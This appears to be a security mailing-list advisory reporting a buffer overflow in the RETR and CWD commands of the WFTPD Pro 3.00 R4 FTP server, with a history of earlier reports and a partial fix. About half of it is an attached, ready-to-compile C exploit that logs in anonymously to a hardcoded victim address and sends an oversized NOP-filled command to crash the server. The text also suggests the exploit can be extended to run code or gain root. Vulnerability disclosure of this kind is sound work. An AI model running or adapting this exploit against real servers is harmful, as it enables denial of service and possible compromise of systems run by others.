WFTP is the Win/NT FTP server by Alun Jones, "an author acknowledged as
an expert in FTP and TCP/IP". This advisory pertains to "Professional"
version 3.00 R4, which appears to be the current version. It can be
downloaded from the author's site at <http://www.wftpd.com/>. WFTPD is
released as shareware, and costs $120.
The latest version of WFTPD is vulnerable to a buffer overflow in the
RETR and CWD commands. The overflow can be used to completely disable
the FTP server, and can probably be exploited to run arbitrary code
on the server host.
This problem was already reported for version 3.0 R1 on March 3, 2001
[1], and the author claimed that he had "fixed" the overflow. What he
apparently did was make the buffers bigger; now instead of ~500 characters
overflowing the buffer, it takes ~32K instead.
Similar buffer overflows were reported on September 5, 2000 for version
2.41 RC12 [2], for version 2.40 on October 28, 1999 [3].
The exploit is essentially unchanged from the one posted a month ago;
since <[EMAIL PROTECTED]> Windows, version, attached is a UNIX version.
An root exploit can probably be adapted from Alberto Solino's code [4].
Len Budney
References:
[1] http://www.securityfocus.com/templates/archive.pike?list=1&mid=166467
[2] http://www.securityfocus.com/templates/archive.pike?list=1&mid=71096
[3] http://www.securityfocus.com/templates/archive.pike?list=1&mid=32397
[4] http://oliver.efri.hr/~crv/security/bugs/Others/wftpd3.html
--
Frugal Tip #40:
Instead of commuting to work every day, consider tending to your job
duties by mental telepathy.
/* WFTPD Pro 3.00 R4 Buffer Overflow exploit
written by Len Budney
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#define BUFSIZE 32774
#define CMD "RETR " /* Alt: use "CWD " and set OFFSET to 4. */
#define OFFSET 5
void main(){
int sockfd, s;
struct sockaddr_in victim;
char buffer[BUFSIZE];
char exploitbuffer[BUFSIZE]={CMD};
char recvbuffer[BUFSIZE];
sockfd=socket(AF_INET,SOCK_STREAM,0); if(sockfd == -1)perror("socket");
victim.sin_family=AF_INET;
victim.sin_addr.s_addr=inet_addr("192.168.197.129");
victim.sin_port=htons(21);
s=connect(sockfd, (struct sockaddr*) &victim, sizeof(victim));
if(s == -1) perror("connect");
recv(sockfd, recvbuffer, sizeof (recvbuffer),0);
memset(recvbuffer, '\0',sizeof(recvbuffer));
send(sockfd, "USER anonymous\r\n",strlen ("USER anonymous\r\n"),0);
recv(sockfd, recvbuffer, sizeof (recvbuffer),0);
memset(recvbuffer, '\0',sizeof(recvbuffer));
send(sockfd, "PASS\r\n",strlen ("PASS\r\n"),0);
recv(sockfd, recvbuffer, sizeof (recvbuffer),0);
memset(recvbuffer, '\0',sizeof(recvbuffer));
memset(exploitbuffer+OFFSET,0x90,sizeof (exploitbuffer)-OFFSET-2);
sprintf(buffer,"%s\r\n",exploitbuffer);
send(sockfd, buffer , sizeof(buffer),0);
recv(sockfd, recvbuffer, sizeof (recvbuffer),0);
close(sockfd);
_exit(0);
}
